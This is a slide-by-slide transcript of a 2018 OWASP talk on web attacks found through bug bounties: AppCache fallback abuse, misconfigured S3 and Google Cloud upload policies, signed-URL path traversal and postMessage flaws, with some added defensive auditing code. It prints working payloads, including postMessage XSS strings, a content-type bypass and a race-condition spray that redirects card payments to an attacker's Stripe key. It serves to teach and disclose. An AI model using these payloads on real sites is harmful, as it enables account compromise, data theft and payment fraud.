
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies

In this talk, top-ranked white-hat hacker Frans Rosén (@fransrosen) will focus on methodologies and results of attacking modern web technologies. He will do a deep dive into postMessage and show how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
Listen to 60 minutes of new hacks, bug bounty stories and learnings that will make you realize that the protocols and policies you believed to be secure are most likely not.

Published in: Software
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies

  1. Attacking Modern Web Technologies. Frans Rosén, @fransrosen
  2. Attacking "Modern" Web Technologies. Frans Rosén, @fransrosen
  3. Modern = stuff people use
  4. Frans Rosén, "The Swedish Ninja"
     • Security Advisor @detectify (twitter: @fransrosen)
     • HackerOne #7 @ /leaderboard/all-time
     • Blog at labs.detectify.com
  5. Frans Rosén
     • Winner of MVH at H1-702 Live Hacking in Vegas!
     • Winner Team Sweden in San Francisco (Oath)
     • Best bug at H1-202 in Washington (Mapbox)
     • Best bug at H1-3120 in Amsterdam (Dropbox)
  6-7. Rundown (tool share!)
     • AppCache: bug in all browsers
     • Upload Policies: weak implementations, bypassing business logic
     • Deep dive in postMessage implementations: the postMessage-tracker extension, abusing sandboxed domains, leaks, extraction, client-side race conditions
  8. AppCache – Not modern!
  9. Disclaimer: found independently by @filedescriptor, announced at last AppSecEU. https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=22
  10-12. AppCache
  13. Cookie Stuffing/Bombing: will make EVERY page return a 500 error = the manifest FALLBACK will be used
  14. Bug in every browser: a manifest placed in /u/2241902/manifest.txt would use the FALLBACK for EVERYTHING, even outside the directory
  15-16. Surprise – the specification was vague: "To mitigate this, manifests can only specify fallbacks that are in the same path as the manifest itself." (https://www.w3.org/TR/2015/WD-html51-20150506/browsers.html#concept-appcache-manifest-fallback) This was confusing: it could mean the path of the fallback URL, and that was what browsers thought. They missed: "Fallback namespaces must also be in the same path as the manifest's URL."
  17. AppCache demo
  18-19. AppCache on Dropbox
     • Could run XML on dl.dropboxusercontent.com as HTML
     • XML installs the manifest in the browser on root
     • Any file downloaded from Dropbox would use the fallback XML-HTML page, which would log the current URL to an external logging site
     • Every secret link would be leaked to the attacker
     Bounty: $12,845
  20-22. Dropbox mitigations
     • No more XML-HTML on dl.dropboxusercontent.com
     • No more public directory for Dropbox users
     • Coordinated bug reporting to every browser
     • No more FALLBACK on root from a file in a path
     • Argued for faster deprecation of AppCache
     • Random subdomains for user files
     Chrome fixed, Edge/IE fixed, Firefox fixed, Safari fixed. https://bugs.chromium.org/p/chromium/issues/detail?id=696806#c40 Reported 28 Feb 2017, fixed ~June 2017. Browser bounties: $3000
  23. AppCache vulns still possible. Requirements:
     • HTTPS only (was changed recently)
     • Uploaded files can run HTML
     • Files could be on an isolated sandboxed domain
     • Files are uploaded to the same directory for all users
  24. ServiceWorkers, big brother of AppCache. Requirements:
     • HTTPS only
     • Uploaded files can run HTML
     • Files could be on an isolated sandboxed domain
     • Files are uploaded to the root path, for example: bucket123.s3.amazonaws.com/test.html
  25. Upload Policies: AWS and Google Cloud
  26-27. Upload Policies: a way to upload files directly to a bucket, without passing the company's server first.
     • Faster upload
     • Secure (signed policy)
     • Easy to do wrong!
  28. Upload Policies: looks like this:
  29. Upload Policies: the policy is a signed, base64-encoded JSON document
  30-31. Pitfalls, AWS S3
     • starts-with $key does not contain anything: we can replace any file in the bucket!
     • starts-with $key does not contain a path separator: we can place stuff in root; remember ServiceWorkers/AppCache?
  32-33. Pitfalls, AWS S3
     • $Content-Type uses an empty starts-with + content-disposition: we can now upload HTML files with Content-type: text/html
     • $Content-Type uses starts-with = image/jpeg: we can still upload HTML with Content-type: image/jpegz;text/html
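As an added example (not code from the talk or from AWS), the following audits an S3 POST policy document for the pitfalls slides 30-33 list: an empty or separator-less `starts-with $key`, and a `starts-with` `Content-Type` that a value like `image/jpegz;text/html` still satisfies. Both sample policies are constructed; the condition shapes follow the AWS POST policy format.

```javascript
// Added example, not from the talk: audit an AWS S3 POST upload policy for the
// pitfalls listed on the slides. A policy is { expiration, conditions: [...] }
// where each condition is ["starts-with" | "eq", "$field", value],
// ["content-length-range", min, max], or { field: value } (exact match).

// Constructed sample policies (not taken from any real site).
const WEAK_POLICY = {
  expiration: "2030-01-01T00:00:00Z",
  conditions: [
    { bucket: "example-bucket" },
    ["starts-with", "$key", ""],                    // any key at all
    ["starts-with", "$Content-Type", "image/jpeg"], // prefix, not exact
  ],
};

const STRICT_POLICY = {
  expiration: "2030-01-01T00:00:00Z",
  conditions: [
    { bucket: "example-bucket" },
    ["starts-with", "$key", "uploads/user-1234/"], // per-user directory
    { "Content-Type": "image/jpeg" },              // exact match only
    ["content-length-range", 0, 5 * 1024 * 1024],
  ],
};

// Find the condition that constrains one form field, e.g. "$key".
// Returns { op, value } or null when no condition names the field.
function getCondition(conditions, field) {
  const want = field.replace(/^\$/, "").toLowerCase();
  for (const c of conditions) {
    if (Array.isArray(c)) {
      if (c.length === 3 && typeof c[1] === "string" &&
          c[1].replace(/^\$/, "").toLowerCase() === want) {
        return { op: c[0].toLowerCase(), value: String(c[2]) };
      }
    } else if (c && typeof c === "object") {
      const name = Object.keys(c).find((n) => n.toLowerCase() === want);
      if (name !== undefined) return { op: "eq", value: String(c[name]) };
    }
  }
  return null;
}

// Evaluate one condition the way S3 does: prefix match for starts-with,
// exact string match otherwise.
function conditionAccepts(cond, submitted) {
  if (cond.op === "starts-with") return submitted.startsWith(cond.value);
  return submitted === cond.value;
}

// Return the list of pitfalls found; an empty list means none of them apply.
function auditUploadPolicy(policy) {
  const findings = [];
  const conds = policy.conditions || [];

  const key = getCondition(conds, "$key");
  if (key === null) {
    findings.push("no $key condition: S3 rejects forms whose fields are not all covered");
  } else if (key.op === "starts-with" && key.value === "") {
    findings.push("empty starts-with $key: the form can overwrite any object in the bucket");
  } else if (key.op === "starts-with" && !key.value.includes("/")) {
    findings.push("$key prefix has no path separator: uploads can land in the bucket root");
  }

  // A form that never sends Content-Type needs no condition for it, so only
  // a weak condition is reported, not a missing one.
  const ct = getCondition(conds, "$Content-Type");
  if (ct !== null && ct.op === "starts-with") {
    if (ct.value === "") {
      findings.push("empty starts-with Content-Type: text/html can be uploaded");
    } else {
      findings.push(`starts-with Content-Type "${ct.value}" also accepts ` +
                    `"${ct.value}z;text/html"; require an exact value instead`);
    }
  }
  return findings;
}

// Stand-alone run: print the findings for both sample policies.
function main() {
  for (const [name, policy] of [["weak", WEAK_POLICY], ["strict", STRICT_POLICY]]) {
    console.log(name, auditUploadPolicy(policy));
  }
  // The prefix check that slide 33 shows being satisfied by image/jpegz;text/html:
  const ct = getCondition(WEAK_POLICY.conditions, "$Content-Type");
  console.log("prefix accepts image/jpegz;text/html:",
              conditionAccepts(ct, "image/jpegz;text/html"));
}
main();
```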
  34-35. Custom business logic (Google Cloud)
     POST /user_uploads/signed_url/ HTTP/1.1
     Host: example.com
     Content-Type: application/json;charset=UTF-8

     {"file_name":"images/test.png","content_type":"image/png"}
     Signed URL back to upload to:
     {"signed_url":"https://storage.googleapis.com/uploads/images/test.png?Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."}
  36-38. Vulnerabilities
     • We can select what file to override
     • If the signed URL allows viewing = read any file. Just fetch the URL and we have the invoice:
     POST /user_uploads/signed_url/ HTTP/1.1
     Host: example.com
     Content-Type: application/json;charset=UTF-8

     {"file_name":"documents/invoice1.pdf","content_type":"application/pdf"}
     {"signed_url":"https://storage.googleapis.com/uploads/documents/invoice1.pdf?Expires=1515198382&GoogleAccessId=example%40example.iam.gserviceaccount.com&Signature=dlMAFC2Gs22eP%2ByoAhwGqo0A0ijySYYtRdkaIHVUr%2FvwKfNSKkKwTTpBpyOF..."}
     Total bounties: ~$15,000
  39. Rolling your own policy logic sucks
  40. Custom Policy Logic: the goal is to reach the bucket root, or another file
  41-42. Back to the 90s! Path traversal with path normalization. Full read access to every object + listing
  43. Expected: regex extraction of URL parts. https://example-bucket.s3.amazonaws.com/dir/file.png Result: https://s3.amazonaws.com/example-bucket/dir/file.png?Signature..
  44-46. Bypass: regex extraction of URL parts. Full read access to every object + listing
  47-51. Temporary URLs with signed links: https://secure.example.com/files/xx11 Full read access to every object
  52-53. Full access to every object
  54. Deep dive in postMessage
  55. Birth of the postMessage-tracker extension: 1 year ago, discussion on last AppSecEU!
  56-57. Birth of the postMessage-tracker extension
     • Catch every listener in all frames
     • Find the function receiving the message
     • Log all messages between all frames
  58-62. What have I found? Regular vuln cases (XSS):
     if (e.data.JSloadScript) {
       if (e.data.JSloadScript.type == "iframe") {
         // create the new iframe element with the src given to us via the event
         local_create_element(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.JSloadScript.value], parent);
       } else {
         localLoadScript(e.data.JSloadScript.value)
       }
     }
     b.postMessage({"JSloadScript":{"value":"data:text/javascript,alert(document.domain)"}},'*')
  63. Complex ones: Data-Extraction
  64. Data-Extraction: listener
  65-66. Data-Extraction: vulnerable origin check
  67. Data-Extraction: looks harmless?
  68. Data-Extraction: initiating ruleset
  69. Data-Extraction: action rules
  70. Data-Extraction: extraction options!
  71. Data-Extraction, trigger:
     { "params": { "testRules": { "rules": [ { "name": "xxx", "triggers": { "type": "Delay", "delay": 5000 } ... } ] } } }
  72. Data-Extraction, state:
     ... "states": { "type": "JSVariableExists", "name": "ClickTaleCookieDomain", "value": "example.com" }, ...
  73. Data-Extraction, action:
     ... "action": { "actualType": "CTEventAction", "type": "TestRuleEvent", "dynamicEventName": { "parts": [ { "type": "ElementValue", "ctSelector": { "querySelector": ".content-wrapper script" } }, { "type": "CookieValue", "name": "csrf_token" } ] }
  74. Data-Extraction: payload
  75. Data-Extraction: CSRF token!
  76. XSS on an isolated but "trusted" domain: a sandboxed domain being trusted and not trusted at the same time. postMessage is used to transfer data from/to the trusted domain.
  77. Document service (ACME.COM: "Create new doc")
  78. XSS on sandbox (usersandbox.com)
  79. User creates a document (ACME.COM, usersandbox.com)
  80. Sandbox opens up in an iframe for the doc converter (ACME.COM, usersandbox.com, usersandbox.com)
  81. Hijack the iframe JS, due to SOP (ACME.COM, usersandbox.com, usersandbox.com)
  82. User uploads a file, postMessage data to converter (ACME.COM, usersandbox.com, usersandbox.com)
  83. Iframe leaks data to attacker's sandbox window (ACME.COM, usersandbox.com, usersandbox.com)
  84. And we have the document data!
  85. 85. Author name her What have I found? Attacking Modern Web Technologies Frans Rosén @fransrosen Client-side Race Conditions!
  86. 86. Author name her Localized welcome screen, JS loaded w/ postMsg Attacking Modern Web Technologies Frans Rosén @fransrosen Loading…
  87. 87. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen mpel.com Welcome! Välkommen! Willkommen! localeservice.com Localized welcome screen, JS loaded w/ postMsg
  88. 88. Author name her Attacking Modern Web Technologies Frans Rosén @fransrosen Welcome! Välkommen! Willkommen! link.com.example.com = OK localeservice.com Localized welcome screen, JS loaded w/ postMsg
  89. 89. Author name her Only works once Attacking Modern Web Technologies Frans Rosén @fransrosen Welcome! Välkommen! Willkommen! localeservice.com
  90. 90. Author name her Only works once Attacking Modern Web Technologies Frans Rosén @fransrosen Welcome! Välkommen! Willkommen! localeservice.com
  91. 91. Author name her Curr not escaped Attacking Modern Web Technologies Frans Rosén @fransrosen Welcome! Välkommen! Willkommen!
  92. 92. Author name her Loaded JS, osl vuln param Attacking Modern Web Technologies Frans Rosén @fransrosen ...&curr=&osl='-alert(1)-'
  93. 93. Author name her alert was blocked. yawn… Attacking Modern Web Technologies Frans Rosén @fransrosen
  94. 94. Author name her alert was blocked. yawn… easy fix Attacking Modern Web Technologies Frans Rosén @fransrosen
  95. 95. Author name her Attacker-site Attacking Modern Web Technologies Frans Rosén @fransrosen link.com.example.com
  96. 96. Author name her Attacker site opens victim site Attacking Modern Web Technologies Frans Rosén @fransrosen link.com.example.com Loading…
97. Loaded JS. link.com.example.com  Loading…
    setInterval(function() {
      if(b) b.postMessage('{"sitelist":"www.example.com/global","siteurl":"www.example.com/uk","curr":"curr=&osl='-(function() {document.body.appendChild(iframe=document.createElement('iframe'));window.alert=iframe.contentWindow['alert'];document.body.removeChild(iframe);window.alert(document.domain)})()-'"}', '*')
    }, 10);
98. Loaded JS (same spray as slide 97). link.com.example.com  Loads mpel.js...  Loading…
99. Loaded JS (same spray as slide 97). link.com.example.com  Välkommen! Willkommen! Welcome! localeservice.com  Loads mpel.js...
100. We won! (same spray as slide 97). link.com.example.com  Välkommen! Willkommen! Welcome! localeservice.com  Loads mpel.js...
101. Client-Side Race Condition: postMessage between JS-load and iframe-load. Worked in all browsers.
102. Client-Side Race Condition #2: Multiple bugs incoming, hang on!
103. Can you find the bug(s)?
    SecureCreditCardController.prototype.isValidOrigin = function (origin) {
      if (origin === null || origin === undefined) {
        return false;
      }
      var domains = [".example.com", ".example.to", ".example.at", ".example.ca", ".example.ch", ".example.be", ".example.de", ".example.es", ".example.fr", ".example.ie", ".example.it", ".example.nl", ".example.se", ".example.dk", ".example.no", ".example.fi", ".example.cz", ".example.pt", ".example.pl", ".example.cl", ".example.my", ".example.co.jp", ".example.co.nz", ".example.co.uk", ".example.com.au", ".example.com.br", ".example.com.ph", ".example.com.mx", ".example.com.sg", ".example.com.ar", ".example.com.tr", ".example.com.hk", ".example.com.tw"];
      var escapedDomains = $.map(domains, function (domain) {
        return domain.replace('.', '.');
      });
      var exampleDomainsRE = '^https://.*(' + escapedDomains.join('|') + ')$';
      return Boolean(origin.match(exampleDomainsRE));
    };
104. 1st bug! (same isValidOrigin code as slide 103)
105. 1st bug!
    ".example.co.nz".replace('.', '.')   // ".example.co.nz"
106. Can you find the next bug? (same isValidOrigin code as slide 103)
107. 2nd bug! (same isValidOrigin code as slide 103)
108. Registering directly under .nz is allowed since 2015! https://en.wikipedia.org/wiki/.nz
109. 2nd bug!
    Boolean("https://www.exampleaco.nz".match('^https://.*(.example.co.nz)$'))   // true
110. 2nd bug! (same as slide 109)
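As an added example (not code from the talk), here is the weak check from slides 103-107 next to a hardened origin check, run over constructed origins; the three-entry allowlist and the sample origins are assumptions.

```javascript
// Added example, not code from the talk: the weak origin check from the
// slides next to a hardened one, run against constructed origins.
// Hypothetical trimmed allowlist; the slide listed ~33 brand domains.
const DOMAINS = ['.example.com', '.example.co.nz', '.example.co.uk'];

// Weak check, as on the slides (Array.map in place of $.map). Two flaws:
//  1. replace('.', '.') is a no-op, and even with '\\.' a string pattern
//     replaces only the FIRST dot, so the dots stay regex wildcards;
//  2. '^https://.*(' accepts any prefix, so the allowlisted suffix only
//     has to appear at the very end of the string.
function isValidOriginWeak(origin) {
  if (origin === null || origin === undefined) return false;
  const escaped = DOMAINS.map((d) => d.replace('.', '.'));
  const re = '^https://.*(' + escaped.join('|') + ')$';
  return Boolean(origin.match(re));
}

// Hardened check: parse the origin, require https and a bare origin
// (e.origin is always serialized scheme://host[:port]), then compare the
// hostname exactly or as a dot-delimited suffix. No regex involved.
function isValidOriginStrict(origin) {
  let url;
  try { url = new URL(origin); } catch (_) { return false; }
  if (url.protocol !== 'https:' || url.origin !== origin) return false;
  const host = url.hostname;
  return DOMAINS.some((d) => host === d.slice(1) || host.endsWith(d));
}

// Constructed origins: legitimate merchant hosts, the exampleaco.nz style
// bypass from the talk, and a non-origin string ending in a listed suffix.
const SAMPLES = [
  'https://www.example.co.nz',
  'https://example.co.nz',
  'https://www.exampleaco.nz',
  'https://attacker.test/?x=.example.com',
];

// Returns { origin: { weak, strict } } for each sample.
function compareChecks(samples = SAMPLES) {
  const out = {};
  for (const o of samples) out[o] = { weak: isValidOriginWeak(o), strict: isValidOriginStrict(o) };
  return out;
}

console.table(compareChecks());
```

Note that the weak regex also rejects the bare apex (https://example.co.nz) because the leading wildcard dot needs a character before "example", while the strict check accepts it; decide explicitly which hosts belong on the list.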
111. Vulnerable scenario: ilikefood.com  Subscribe!
112. Opens PCI-certified domain for payment: ilikefood.com  Subscribe!  foodpayments.com
113. Iframe loaded, main frame sends INIT to iframe:
    iframe.postMessage('INIT', '*')
114. Iframe registers the sender of INIT as msgTarget (foodpayments.com):
    if(e.data==INIT && originOK) {
      msgTarget = e.source
      msgTarget.postMessage('INIT','*')
    }
115. Iframe tells main all is OK (ilikefood.com):
    if(e.data==INIT && e.source==iframe) {
      all_ok_dont_kill_frame()
    }
116. Main window sends over provider data:
    if(INIT) {
      iframe.postMessage('["LOAD","stripe","pk_abc123"]', '*')
    }
117. Iframe loads payment provider and kills channel (foodpayments.com; main window code as on slide 116):
    if(INIT) {
      if(e.data[0]==LOAD && originOK) {
        initpayment(e.data[1], e.data[2])
        window.removeEventListener('message', listener)
      }
    }
118. Did you see it?
119. Open ilikefood.com from attacker: exampleaco.nz opens ilikefood.com  Subscribe!
120. Victim clicks subscribe, iframe is loaded: ilikefood.com  Subscribe!  foodpayments.com  exampleaco.nz
121. Attacker sprays out LOAD to iframe (from exampleaco.nz):
    setInterval(function(){
      child.frames[0].postMessage('["LOAD","stripe","pk_diffkey"]','*')
    }, 100)
122. INIT-dance resolves ('INIT'<->'INIT'), but attacker wins with LOAD (same spray as slide 121).
123. LOAD kills listener, we won the race! Stripe loads… Frame loads api.stripe.com?key=pk_diffkey…
124. It's now the attacker's Stripe account: Enter credit card. Pay!
125. Payment will fail for site… foodpayments.com: Payment failed :(
126. Payment will fail for site…but worked for Stripe!
127. From Stripe-logs we can charge the card anything!
128. (same as slide 127)
129. Client-Side Race Condition #2: postMessage from opener between two other postMessage-calls. Chrome seems to be the only one allowing this to happen afaik.
130. postMessage-tracker Speedbumps
131. postMessage-tracker Speedbumps. • Problem 1: Function-wrapping (Raven.js, rollbar, bugsnag, NewRelic). Before: (screenshot)
132. Problem 1, after: (screenshot). Solution: Find wrapper and jump over it. console better due to this!
133. • Problem 2: jQuery-wrapping, such a mess (differs between versions). Before: (screenshot)
134. Problem 2, after: (screenshot). Solution: Use either ._data, .expando or .events from the jQuery object!
135. • Problem 3: Anonymous functions. Could not identify them at all. Before: (screenshot)
136. Problem 3, after: (screenshot). Solution: Can't extract using Function.toString() in Chrome :( Will however at least show them as tracked now.
137. postMessage-tracker released? No :( I suck. "Soon"?
138. postMessage-tracker released? No :( I suck. "Soon"? Want to complete more features!
139. postMessage-tracker released? No :( I suck. "Soon"? Want to complete more features! • Trigger debugger to breakpoint messages (since we own the order) • Try to see if .origin is being used and how • If regex, run through Rex!
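As an added example (not code from the talk), a model of the foodpayments.com iframe listener from slides 114-117 in its vulnerable and hardened forms, replayed against the race from slides 119-122; the window stubs, the merchant origin https://www.example.co.nz (standing in for ilikefood.com, one of the allowlisted brand domains) and the allowlist are assumptions.

```javascript
// Added example, not code from the talk: the iframe's message listener,
// vulnerable (as on the slides) and hardened, replayed against the race.
// Window objects are constructed stubs that record what gets posted back.
const ALLOWED_PARENTS = new Set(['https://www.example.co.nz']); // hypothetical allowlist
const makeWindow = (origin) => ({ origin, received: [], postMessage(m, t) { this.received.push([m, t]); } });

// Vulnerable listener, as on slides 114-117: any source passing originOK may
// send LOAD; the first LOAD wins and the listener removes itself.
function vulnerableHandler(state, e) {
  const weakOriginOK = /^https:\/\/.*.example.co.nz$/.test(e.origin); // unescaped dots, like the slides
  if (state.closed || !weakOriginOK) return state;
  if (e.data === 'INIT') { state.msgTarget = e.source; e.source.postMessage('INIT', '*'); }
  else if (Array.isArray(e.data) && e.data[0] === 'LOAD') {
    state.provider = e.data[1]; state.key = e.data[2]; state.closed = true; // initpayment + removeEventListener
  }
  return state;
}

// Hardened listener: exact-origin allowlist, INIT accepted once, LOAD accepted
// only from the window (and origin) that completed INIT, replies never use '*'.
function hardenedHandler(state, e) {
  if (state.closed || !ALLOWED_PARENTS.has(e.origin)) return state;
  if (e.data === 'INIT' && !state.msgTarget) {
    state.msgTarget = e.source; state.targetOrigin = e.origin;
    e.source.postMessage('INIT', e.origin);
  } else if (Array.isArray(e.data) && e.data[0] === 'LOAD' &&
             e.source === state.msgTarget && e.origin === state.targetOrigin) {
    state.provider = e.data[1]; state.key = e.data[2]; state.closed = true;
  }
  return state;
}

// Replays slides 119-122: parent INIT, the opener spraying LOAD with its own
// key, then the parent's real LOAD. Returns the key the iframe ends up with
// and the targetOrigin the iframe used when answering INIT.
function replayRace(handler) {
  const parent = makeWindow('https://www.example.co.nz');  // stands in for ilikefood.com
  const attacker = makeWindow('https://www.exampleaco.nz'); // opener on a 2nd-level .nz domain
  const events = [
    { data: 'INIT', origin: parent.origin, source: parent },
    { data: ['LOAD', 'stripe', 'pk_diffkey'], origin: attacker.origin, source: attacker },
    { data: ['LOAD', 'stripe', 'pk_abc123'], origin: parent.origin, source: parent },
  ];
  const state = events.reduce((s, e) => handler(s, e), { closed: false, msgTarget: null });
  return { key: state.key, replyTarget: parent.received.length ? parent.received[0][1] : null };
}

console.log('vulnerable:', replayRace(vulnerableHandler), 'hardened:', replayRace(hardenedHandler));
```

Binding LOAD to e.source also stops a window with an allowlisted origin that never completed INIT, which a pure origin check cannot do.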
140. detectify. Frans Rosén (@fransrosen). That's it!